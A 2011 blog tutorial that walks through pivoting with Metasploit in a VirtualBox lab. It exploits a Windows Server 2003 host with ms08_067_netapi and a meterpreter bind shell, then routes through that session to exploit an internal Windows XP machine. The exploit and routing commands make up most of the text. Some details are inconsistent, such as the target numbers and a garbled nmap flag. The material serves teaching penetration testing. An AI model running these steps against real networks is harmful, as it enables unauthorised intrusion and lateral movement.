Monday, October 10, 2011

Pivoting into Other Systems with Metasploit


Pivoting is a powerful technique within the Metasploit Framework that allows a hacker to access a private subnet within a network.  For example, an attacker would compromise a host (ex: web server) that is accessible (i.e., routable IP address) and use that host as a staging point to pivot and compromise other systems in subnets that would not have been accessible from outside the network.  According to Metasploit, pivoting is a Meterpreter method that allows for the attack of other systems on a network through the Meterpreter console.

For this setup, I will use the following VirtualBox virtual machines:
·         BackTrack 5 R1
o   Attacker machine
o   192.168.1.107
·         Windows Server 2003
o   Web Server
o   Accessible (Public IP) – 192.168.1.105
o   Non-accessible (Private IP)  – 192.168.56.102
·         Windows XP
o   Host machine
o   192.168.56.103
In the following tutorial, I will use the BackTrack 5 machine to exploit the web server (Windows Server 2003) and setup a staging point on the server for pivot to the Windows XP host that is only accessible to users inside the network.
First, I will map the network with Nmap to discover any accessible hosts
·         nmap -sS 192.168.1.1/24
Once I discovered 192.168.1.105, I will scan for open ports and services running
·         nmapsV -O 192.168.1.105
The scan informs me that port 80 (web server port for public access) is running an Apache Web Server; along with port 135 and port 139.  I use the Windows netapi exploit, known as “Server Service Vulnerability.”
·         use windows/smb/ms08_067_netapi
·         show payloads
·         set PAYLOAD windows/meterpreter/bind_tcp
o   Bind shell is a payload that “binds” a command prompt to a listening port on the target machine, which the attacker can then connect and maintain access to the machine.
·         show options
o   View what settings are needed.
·         set RHOST 192.168.1.105
·         show targets
o   To specify our specific target
·         set target 9
o   Target 9 is Windows Server 2003 SP1
·         exploit
Once the host is exploited, a meterpreter session is created and our machine has direct access and control over the machine.  We confirm this by entering the ipconfig command to view the IP address.  The command returns:
·         192.168.1.105 / 255.255.255.0
·         192.168.56.102 / 255.255.255.0
Since we do not have access to the 192.168.56.0 network, we will run an ARP scan and discover hosts that are up in the network.
·         run arp_scanner -r 192.168.56.1/24
With the discovered network and hosts, we will setup a route to have the private network send packets (data) through our machine (meterpreter session id).  First, we have to background our meterpreter session.
·         background
·         route add 192.168.56.1 255.255.255.0 1
o   The command will route the subnet traffic through our meterpreter session id, 1.
o   You can view the session id by entering the command sessions –l
·         route print
o   To view the previously entered command
We need to do a port scan on the discovered host from the arp_scan to find a port that we can setup communication.  First, we need to go back and access the auxiliary module for TCP port scanning.  The required settings that will be set is the remote host (RHOSTS).
·         back
·         use scanner/portscan/tcp
·         show options
·         set RHOSTS 192.168.56.103
·         run
Port 25, 80, 135, and 139 are open.  We will use the RPC exploit in port 135 and subsequently have direct access and control over the machine with a meterpreter session.
·         back
·         use windows/smb/ms08_067_netapi
·         show options
·         set RHOST 192.168.56.103
·         set PAYLOAD windows/meterpreter/bind_tcp
·         show options
·         show targets
o   To specify our specific target
·         set target 9
o   Target 3 is Windows XP SP2
·         exploit
A meterpreter session should be created and the attacker machine has full control of the compromised host in the private subnet.  Type ipconfig to view the compromised host IP configuration.
Background the meterpreter session by entering the command background.
View your sessions by typing sessions.
The output will display the steps you have taken to get from your machine to the host in the private subnet under the “Connection” column.
  • 192.168.1.107:59377 -> 192.168.1.105:4444
    • From the attacker machine to the web server
  • 192.168.1.107-192.168.1.105:0 -> 192.168.56.103:4444
    • From the web server to the XP host

No comments:

Post a Comment